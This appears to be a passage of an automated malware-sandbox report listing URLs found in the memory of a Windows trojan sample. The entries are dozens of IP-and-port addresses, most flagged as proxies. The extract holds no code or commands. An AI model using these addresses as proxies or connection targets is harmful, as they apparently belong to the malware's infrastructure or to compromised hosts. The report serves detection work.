                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.242.116.150:50003
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.242.116.150:50003://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.242.69.196:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.242.69.196:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.243.15.171:18
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.243.15.171:18://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.254.53.70:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.254.53.70:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.145.219:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.145.219:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD5F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.115:1973
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.115:1973://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.233:1975
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.233:1975://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.234:1975
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.234:1975://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.186:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.186:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.188:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.188:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.189:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.189:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.66.228:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.66.228:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.25.129:6060
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.25.129:6060://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.46.1:6060
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.46.1:6060://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A56000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.6.30:6060
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.6.30:6060://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C778C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.6.45:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.57.6.45:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.232.18:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.232.18:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.234.231:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.234.231:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.235.216:23500
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.235.216:23500://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.26.210:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.26.210:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.0.222:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.0.222:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.103.19:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.103.19:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.160.171:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.160.171:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.73:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB2D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.73:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C906D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.76:1974
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C906D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.162.76:1974://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD74000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.224.91:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.224.91:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.227.98:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.227.98:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.35:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.35:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.35:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.35:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA50C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.39:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.39:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.53:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.53:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.53:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.53:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.58:1981x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB02D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.251.85:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB02D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.251.85:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.251.85:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.251.85:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.46.180:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.46.180:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F85000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.28:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.28:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.2:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.2:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.70.106.1:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.70.106.1:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7850000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C782D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.70.12.54:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.70.12.54:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.85.189.66:39475
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.85.189.66:39475://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.252.91:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.252.91:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.46.112:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.46.112:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.93.71.21
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8257000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.93.71.21://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.93.71.21:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C805E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.112.209.68:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C805E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.112.209.68:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C778C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.193.58.96:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.193.58.96:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9205000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.200.196.208:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.200.196.208:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.49.148.167:9001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.49.148.167:9001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.98.10.34
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.98.10.34://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.98.10.34:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.104.16:15673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.104.16:15673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.155.154:15673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.155.154:15673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.232.224:31993
